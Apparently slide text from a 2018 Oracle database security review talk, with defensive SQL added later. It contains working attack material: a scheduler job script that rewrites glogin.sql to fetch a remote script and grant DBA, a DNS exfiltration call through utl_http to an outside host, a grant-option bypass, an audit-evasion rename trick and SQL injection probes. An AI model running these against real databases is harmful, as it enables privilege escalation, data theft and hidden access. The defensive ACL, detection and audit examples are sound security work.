Best of Oracle 2018
Agenda
- Intro
- livesql.oracle.com
- January 2018 - November 2018
- DNS Exfiltration
- Bypass Oracle Auditing
- Outlook 2019
- Q&A
OOW 2018 & Larry's bot army for autonomous databases

"... modern cloud is constantly under attack by what are called botnets..."*
"Because if they have robot attacks on our clouds, and robot attacks in our data centers and our government agencies, you better have robotic defenses..."*

Already discussed in 2012 by Red-Database-Security ("Selfdefending databases"**)

* https://www.foxbusiness.com/technology/oracle-is-building-a-robot-army-to-protect-data
** http://www.red-database-security.com/wp/selfdefending_databases_hashdays_2012.pdf
OOW 2018 & Larry Ellison about Cloud Security
https://www.foxbusiness.com/technology/oracle-is-building-a-robot-army-to-protect-data
LiveSQL security (livesql.oracle.com)
Oracle 18c test drive: a hardened Oracle 18c with a free SQL interface
Reported to secalert@oracle.com; 2 weeks later the problem was fixed, and I got a credit in the October 2018 CPU
livesql.oracle.com - Part II
< DBMS_SCHEDULER.DISABLE(M_NEW_JOB_NAME);
---
> SYS.DBMS_SCHEDULER.DISABLE(M_NEW_JOB_NAME);
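Review bot: the `SYS.` prefix on the `DBMS_SCHEDULER.DISABLE` call is the right fix, because an unqualified package name is resolved in the schema the unit runs under (the owner for definer's rights, the caller for invoker's rights), where a same-named object or private synonym takes precedence over the PUBLIC synonym. The diff shows only the DISABLE line; every other unqualified `DBMS_SCHEDULER.*` or SYS-package reference in the same unit needs the same prefix, and a one-line comment above the call stating why the prefix must stay would keep a later clean-up from removing it.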
- https://www.dbarj.com.br/en/2018/08/dissecting-180717-bp-psu-ru-and-rur/
- https://www.dbarj.com.br/en/2018/05/dissecting-180417-bp-psu-ru-and-rur/
- https://www.dbarj.com.br/en/2018/05/oracle-12-2-0-1-jan2018-rur-180417-or-180411/
- https://www.dbarj.com.br/en/2018/01/dissecting-180116-bp-psu-ru-rur/
Oracle Vulnerabilities 2018

January 2018 CPU*
* https://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html
- http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html

CVE-2017-10282 (CVSS 9.1)*
* https://www.dbarj.com.br/en/2018/01/sql-injection-on-12c-cbview-package-finally-fixed-on-180116/
Oracle 12.x Exploit I
SQL> conn doag2017/doag2017
Connect durchgeführt.
Roles of the demo user: CONNECT, EXECUTE_CATALOG_ROLE
https://www.exploit-db.com/exploits/42966/

CVE-2017-12617 (CVSS 8.1)
February 2018

Rico 2 - Open Source BBED*,**
Oracle Transparent Data Encryption (TDE) is blocking data access via data blocks.
* https://github.com/ora600pl/rico2
** http://blog.ora-600.pl/2018/02/14/project-rico2-and-the-history-of-apex-upgrade-that-went-terribly-wrong/
March 2018

April 2018 CPU*
* https://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html

SQL Injection Detection in SQL Developer**
** https://www.thatjeffsmith.com/archive/2018/04/18-1-features-sql-injection-detection/
May 2018
* https://www.dbarj.com.br/en/2018/05/how-to-bypass-requirement-of-with-grant-option-on-views-accessing-third-party-tables/
May 2018 - Bypass grant option*

USER_B owns the view v1 on USER_A.T1 but holds no grant option on T1, so granting the view on fails:

SQL> grant select on USER_B.v1 to USER_C;
grant select on USER_B.v1 to USER_C
*
FEHLER in Zeile 1:
ORA-01720: Berechtigungsoption für 'USER_A.T1' nicht vorhanden

Use a pipelined function to bypass the limitation:

SQL> conn USER_B/oracle
Connected.
SQL> CREATE OR REPLACE PACKAGE pkg_bypass_go AS
  TYPE t_tab IS TABLE OF USER_A.T1%ROWTYPE;
  FUNCTION run (p_sql IN CLOB) RETURN t_tab PIPELINED;
END pkg_bypass_go;
/
Package created.

SQL> CREATE OR REPLACE PACKAGE BODY pkg_bypass_go AS
  FUNCTION run (p_sql IN CLOB) RETURN t_tab PIPELINED IS
    l_cursor SYS_REFCURSOR;
    l_row    USER_A.T1%ROWTYPE;
  BEGIN
    OPEN l_cursor FOR p_sql;
    LOOP
      FETCH l_cursor INTO l_row;
      EXIT WHEN l_cursor%NOTFOUND;
      PIPE ROW (l_row);
    END LOOP;
    CLOSE l_cursor;
    RETURN;
  END run;
END pkg_bypass_go;
/

If the USER_B account, who owns the view, also had the CREATE PROCEDURE privilege, he could bypass the ORA-01720 error by encapsulating the table T1 results in a pipelined function and using this function inside his view.

After the view is rebuilt on top of the function, the same grant goes through:
Grant succeeded.
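A dictionary query to find existing instances of this pattern, added here as an example (it is neither from the talk nor from the dbarj post). It lists views that their owner has granted to other users while the view depends on a definer's-rights PL/SQL unit of the same owner which in turn reads a table or view in a third schema, and it reports whether the view owner holds a grantable privilege on that foreign object. It assumes SELECT on the DBA_* views (for instance via SELECT_CATALOG_ROLE); no user or object names are hard-coded.

```sql
-- Added example: detect "view -> own PL/SQL unit -> foreign table" chains
-- that were granted to third parties without WITH GRANT OPTION on the table.
SELECT DISTINCT
       tp.owner      AS view_owner,
       tp.table_name AS granted_view,
       tp.grantee,
       dep1.referenced_owner || '.' || dep1.referenced_name AS plsql_unit,
       dep2.referenced_owner || '.' || dep2.referenced_name AS foreign_object,
       CASE WHEN fp.grantable = 'YES'
            THEN 'grant option held' ELSE 'NO grant option' END AS grantor_right
FROM   dba_tab_privs    tp
JOIN   dba_views        v    ON v.owner     = tp.owner
                            AND v.view_name = tp.table_name
-- view -> PL/SQL unit owned by the same user as the view
JOIN   dba_dependencies dep1 ON dep1.owner            = v.owner
                            AND dep1.name             = v.view_name
                            AND dep1.type             = 'VIEW'
                            AND dep1.referenced_owner = v.owner
                            AND dep1.referenced_type IN ('FUNCTION', 'PACKAGE')
-- PL/SQL unit (spec or body) -> table or view in another schema
JOIN   dba_dependencies dep2 ON dep2.owner = dep1.referenced_owner
                            AND dep2.name  = dep1.referenced_name
                            AND dep2.type IN ('FUNCTION', 'PACKAGE', 'PACKAGE BODY')
                            AND dep2.referenced_type IN ('TABLE', 'VIEW')
                            AND dep2.referenced_owner <> v.owner
-- only definer's-rights units lend the owner's table access to callers
JOIN   dba_procedures   pr   ON pr.owner       = dep1.referenced_owner
                            AND pr.object_name = dep1.referenced_name
                            AND pr.object_type = dep1.referenced_type
                            AND pr.procedure_name IS NULL
                            AND pr.authid = 'DEFINER'
-- does the view owner hold a grantable SELECT/READ on the foreign object?
LEFT JOIN dba_tab_privs fp   ON fp.grantee    = v.owner
                            AND fp.owner      = dep2.referenced_owner
                            AND fp.table_name = dep2.referenced_name
                            AND fp.privilege IN ('SELECT', 'READ')
                            AND fp.grantable  = 'YES'
WHERE  tp.privilege IN ('SELECT', 'READ')
AND    tp.grantee <> v.owner
AND    tp.grantee NOT IN ('SYS', 'SYSTEM')
ORDER  BY view_owner, granted_view, grantee;
```

Rows reporting "NO grant option" are the cases to review with the table owner. The query follows one level of dependency only; a view built on another view that calls the function is not caught, so run it after each privilege review rather than once.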
June 2018
* https://mahmoudhatem.wordpress.com/2018/06/13/using-ld_preload-to-implement-a-hidden-trojan-in-an-oracle-database/
** https://www.dbarj.com.br/en/2018/06/protecting-oracle-database-binaries-against-malicious-changes/

June 2018 - Protecting Oracle Database Binaries against malicious changes**
New Oracle 18c feature: Read-Only Oracle Home
Ensure that no Oracle process is creating or changing files in the $ORACLE_HOME:
1. Save current permissions and owners
2. Remove privileges from the OS user oracle
3. Roll back before applying patches
June 2018 - Trojan in TNS Listener*
* https://mahmoudhatem.wordpress.com/2018/06/13/using-ld_preload-to-implement-a-hidden-trojan-in-an-oracle-database/
July 2018

July 2018 CPU*: 3 security fixes (1 remotely exploitable)
* https://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html

CVE-2018-3004 (CVSS 5.4)*
Privilege escalation via a Java deserialization vector that bypasses built-in Oracle JVM security. Proper exploitation can allow an attacker to gain shell-level access on the server and SYS-level access to the database.
Oracle 12.x Exploit I
SQL> conn doag2018/doag2018
Connect durchgeführt.
October 2018 CPU*
* https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html

CVE-2018-7489 (Rapid Home Provisioning)
- https://access.redhat.com/security/cve/cve-2018-7489
- https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=891614
November 2018

DOAG 2018
Privilege Capturing feature free in Oracle Enterprise Edition*,**
* http://www.petefinnigan.com/weblog/archives/00001448.htm
** https://docs.oracle.com/en/database/oracle/oracle-database/18/dblic/Licensing-Information.html#GUID-0F9EB85D-4610-4EDF-89C2-4916A0E7AC87

End of the annual review
DNS Exfiltration
https://blog.fosec.vn/dns-data-exfiltration-what-is-this-and-how-to-use-2f6c69998822

The HTTP request itself fails (no listener on the target), but the name server has already seen the crafted host name, which is all the exfiltration needs:

SQL> select utl_http.request('Live_from_DOAG2018.eeebce28d20630e3b826.d.requestbin.net') from dual;
FEHLER in Zeile 1:
ORA-29273: HTTP-Anforderung nicht erfolgreich
ORA-12541: TNS: Kein Listener
ORA-06512: in "SYS.UTL_HTTP", Zeile 1491
ORA-06512: in Zeile 1
SQL>
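The countermeasure for the demo above is a network ACL that names the hosts a database user may reach, plus taking UTL_HTTP and UTL_INADDR away from PUBLIC. The block below is an added example (not from the talk) in 12c DBMS_NETWORK_ACL_ADMIN syntax; the principal APP_USER and the host api.internal.example are assumed names. The ACL is evaluated against the literal host name, so a name that no ACE covers is refused with ORA-24247 (check on your own release that this happens before the name is resolved); the 'resolve' privilege is the one that governs UTL_INADDR lookups.

```sql
-- Added example: restrict outbound network use from PL/SQL.

-- 1. Inventory: who may reach which hosts. A host of '*' means "anywhere",
--    which is exactly what the data-in-hostname trick needs.
SELECT host, lower_port, upper_port, principal, privilege, grant_type
FROM   dba_host_aces
ORDER  BY host, principal, privilege;

-- 2. Drop a wildcard grant for the application user, if one exists
BEGIN
  DBMS_NETWORK_ACL_ADMIN.REMOVE_HOST_ACE(
    host => '*',
    ace  => xs$ace_type(privilege_list => xs$name_list('http', 'connect', 'resolve'),
                        principal_name => 'APP_USER',
                        principal_type => xs_acl.ptype_db));
  COMMIT;
END;
/

-- 3. Allow only the host and port the application really needs
BEGIN
  DBMS_NETWORK_ACL_ADMIN.APPEND_HOST_ACE(
    host       => 'api.internal.example',   -- assumed host
    lower_port => 443,
    upper_port => 443,
    ace        => xs$ace_type(privilege_list => xs$name_list('http'),
                              principal_name => 'APP_USER',
                              principal_type => xs_acl.ptype_db));
  COMMIT;
END;
/

-- 4. Take the packages away from PUBLIC so that only users you grant them to
--    can call them at all (check application dependencies first)
REVOKE EXECUTE ON sys.utl_http   FROM PUBLIC;
REVOKE EXECUTE ON sys.utl_inaddr FROM PUBLIC;

-- 5. Re-run step 1 and, as APP_USER, try a host that no ACE covers:
--    the call must fail with ORA-24247 instead of reaching the network
SELECT utl_http.request('http://not-in-acl.example/') FROM dual;
```

Step 4 is the part most likely to break something: UTL_HTTP is granted to PUBLIC out of the box, so list the schemas that actually call it (DBA_DEPENDENCIES with REFERENCED_NAME = 'UTL_HTTP') and grant EXECUTE to those before revoking.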
Oracle 12.x Exploit I
The job script rewrites glogin.sql, the file SQL*Plus executes at every login:

l_script := '
host icacls "C:\app\orawin\product\12.1.0\dbhome_1\sqlplus\admin\glogin.sql" /grant Users:F
host echo @http://www.red-database-security.com/beta/test.sql >> C:\app\orawin\product\12.1.0\dbhome_1\sqlplus\admin\glogin.sql
host echo grant dba to webuser identified by webuser; >>C:\app\orawin\product\12.1.0\dbhome_1\sqlplus\admin\glogin.sql
';

DBMS_SCHEDULER.create_job(
  job_name        => l_job_name,
  job_type        => 'SQL_SCRIPT',
  job_action      => l_script,
  credential_name => 'oracle_ol6_121',
  enabled         => FALSE);
SQL> select * from dual where 1=1 and dbms_xdb_version.checkin((select user from dual))='1';
select * from dual where 1=1 and dbms_xdb_version.checkin((select user from dual))='1'
*
FEHLER in Zeile 1:
ORA-31001: Ressourcen-Handle oder Pfadname ungültig: SYS
ORA-06512: in "XDB.DBMS_XDB_VERSION", Zeile 30
ORA-06512: in "XDB.DBMS_XDB_VERSION", Zeile 45

SQL> select * from dual where 1=1 and dbms_xdb_version.makeversioned((select user from dual))='1';
select * from dual where 1=1 and dbms_xdb_version.makeversioned((select user from dual))='1'
*
FEHLER in Zeile 1:
ORA-31001: Ressourcen-Handle oder Pfadname ungültig: SYS
ORA-06512: in "XDB.DBMS_XDB_VERSION", Zeile 3
ORA-06512: in "XDB.DBMS_XDB_VERSION", Zeile 18

* https://notwhy.github.io/2018/06/hacking-oracle/
Findings from Security Audits in 2018
Sample (terminal screenshot): "Who am I" -> weber, "Who" -> oracle
Auditing SYS (with login user)
Alternative: a logon trigger can read the (original) login user id from /proc/<processid>/loginuid via an external table and join this uid with the real name from /etc/passwd (via external table or inline external SQL).
(Screenshot: su - oracle in both sessions)
https://blogs.oracle.com/oraclemagazine/unify-auditing
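One way to build the logon-trigger variant described above, as an added example that is not code from the talk. It is Linux-specific and only meaningful for local (bequeath) connections: the shadow process inherits the audit loginuid of the terminal session, which su does not change, so the /proc/self/loginuid the server process reads is the uid the person logged in with. Sessions that come in through the listener inherit the listener's loginuid instead. Directory, table and trigger names are assumed; run the block as the schema that should own the audit objects, which needs READ on both directories, and verify on your platform that ORACLE_LOADER reads procfs files (the talk reports that it does).

```sql
-- Added example: record the real login account behind SYS / SYSDBA sessions.
CREATE OR REPLACE DIRECTORY etc_dir  AS '/etc';
CREATE OR REPLACE DIRECTORY self_dir AS '/proc/self';   -- "self" = the server process

-- /etc/passwd: name:password:uid:gid:gecos:home:shell
CREATE TABLE sec_os_passwd (
  username VARCHAR2(64),  passwd VARCHAR2(8),    os_uid NUMBER, os_gid NUMBER,
  gecos    VARCHAR2(200), home   VARCHAR2(200), shell  VARCHAR2(200))
ORGANIZATION EXTERNAL (
  TYPE ORACLE_LOADER
  DEFAULT DIRECTORY etc_dir
  ACCESS PARAMETERS (
    RECORDS DELIMITED BY NEWLINE
    NOBADFILE NOLOGFILE NODISCARDFILE
    FIELDS TERMINATED BY ':' MISSING FIELD VALUES ARE NULL)
  LOCATION ('passwd'))
REJECT LIMIT UNLIMITED;

-- /proc/self/loginuid: a single number (4294967295 means "not set")
CREATE TABLE sec_os_loginuid (loginuid NUMBER)
ORGANIZATION EXTERNAL (
  TYPE ORACLE_LOADER
  DEFAULT DIRECTORY self_dir
  ACCESS PARAMETERS (
    RECORDS DELIMITED BY NEWLINE
    NOBADFILE NOLOGFILE NODISCARDFILE
    FIELDS TERMINATED BY ':')
  LOCATION ('loginuid'))
REJECT LIMIT UNLIMITED;

CREATE TABLE sec_sys_logon_log (
  logon_time TIMESTAMP DEFAULT SYSTIMESTAMP,
  db_user    VARCHAR2(128),
  os_user    VARCHAR2(128),   -- what USERENV.OS_USER reports: "oracle" after su
  login_uid  NUMBER,          -- what loginuid reports: the uid before su
  login_name VARCHAR2(64),    -- that uid resolved through /etc/passwd
  sid        NUMBER);

-- Autonomous so the row is committed on its own; errors are rolled back and
-- ignored so that this helper can never keep an administrator out.
CREATE OR REPLACE TRIGGER trg_sys_logon_source
AFTER LOGON ON DATABASE
DECLARE
  PRAGMA AUTONOMOUS_TRANSACTION;
  l_uid  NUMBER;
  l_name VARCHAR2(64);
BEGIN
  IF SYS_CONTEXT('USERENV', 'SESSION_USER') = 'SYS'
     OR SYS_CONTEXT('USERENV', 'ISDBA') = 'TRUE' THEN
    SELECT l.loginuid, p.username
    INTO   l_uid, l_name
    FROM   sec_os_loginuid l
    LEFT JOIN sec_os_passwd p ON p.os_uid = l.loginuid;
    INSERT INTO sec_sys_logon_log (db_user, os_user, login_uid, login_name, sid)
    VALUES (SYS_CONTEXT('USERENV', 'SESSION_USER'),
            SYS_CONTEXT('USERENV', 'OS_USER'),
            l_uid, l_name, SYS_CONTEXT('USERENV', 'SID'));
    COMMIT;
  END IF;
EXCEPTION
  WHEN OTHERS THEN ROLLBACK;
END;
/

-- Review: which person was behind each "oracle" SYSDBA session?
SELECT logon_time, db_user, os_user, login_uid, login_name
FROM   sec_sys_logon_log
ORDER  BY logon_time DESC;
```

A login_uid of 4294967295 with a NULL login_name marks a session whose process tree never went through a PAM login (listener-spawned servers, cron jobs), which is itself worth knowing.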
How can we get the table data
without triggering auditing?
Alter table rename scott.emp to scott.noemp;
select * from scott.noemp;
Alter table rename scott.noemp to scott.emp;
rename scott.emp to scott.noemp;
select * from scott.noemp;
rename scott.noemp to scott.emp;
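Unified Auditing policies that make the rename trick above visible instead of depending on an object policy tied to the name SCOTT.EMP, added here as an example (not from the talk; policy names are my own). It assumes Unified Auditing on 12c or later, and object-level EXECUTE auditing of whole packages in step 4 is assumed to need 12.2 or later. Step 0 verifies the action names against the data dictionary before anything is created.

```sql
-- Added example: audit the evasion and the privilege, not just the object name.

-- 0. Confirm that this release accepts the action names used below
SELECT name
FROM   auditable_system_actions
WHERE  name IN ('RENAME', 'ALTER TABLE')
ORDER  BY name;

-- 1. Record every RENAME and ALTER TABLE, whatever the object is called
CREATE AUDIT POLICY pol_rename_objects
  ACTIONS RENAME, ALTER TABLE;
AUDIT POLICY pol_rename_objects;

-- 2. Audit by privilege: a session that reads SCOTT.NOEMP through
--    SELECT ANY TABLE / READ ANY TABLE is recorded under any table name
CREATE AUDIT POLICY pol_any_table_read
  PRIVILEGES SELECT ANY TABLE, READ ANY TABLE;
AUDIT POLICY pol_any_table_read;

-- 3. Keep the object policy for the sensitive table; policy 1 now records
--    the rename that used to hide the read from it
CREATE AUDIT POLICY pol_emp_read
  ACTIONS SELECT ON scott.emp;
AUDIT POLICY pol_emp_read;

-- 4. Same idea for the scheduler path of the Exploit I slide: record every
--    call into DBMS_SCHEDULER and DBMS_CREDENTIAL (assumed: 12.2 or later)
CREATE AUDIT POLICY pol_scheduler_use
  ACTIONS EXECUTE ON sys.dbms_scheduler,
          EXECUTE ON sys.dbms_credential;
AUDIT POLICY pol_scheduler_use;

-- 5. Review: who renamed what, and which reads were caught by privilege
SELECT event_timestamp, dbusername, os_username, action_name,
       object_schema, object_name, unified_audit_policies, sql_text
FROM   unified_audit_trail
WHERE  unified_audit_policies LIKE '%POL_RENAME_OBJECTS%'
   OR  unified_audit_policies LIKE '%POL_ANY_TABLE_READ%'
ORDER  BY event_timestamp DESC;
```

Policy 2 only helps against readers who rely on a system privilege; a user with a direct object grant keeps that grant across the rename and is caught only by policy 1, which is why the rename itself is the event to alert on.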
Outlook 2019
- Migration to 18c/19c
- Oracle Multi-Tenant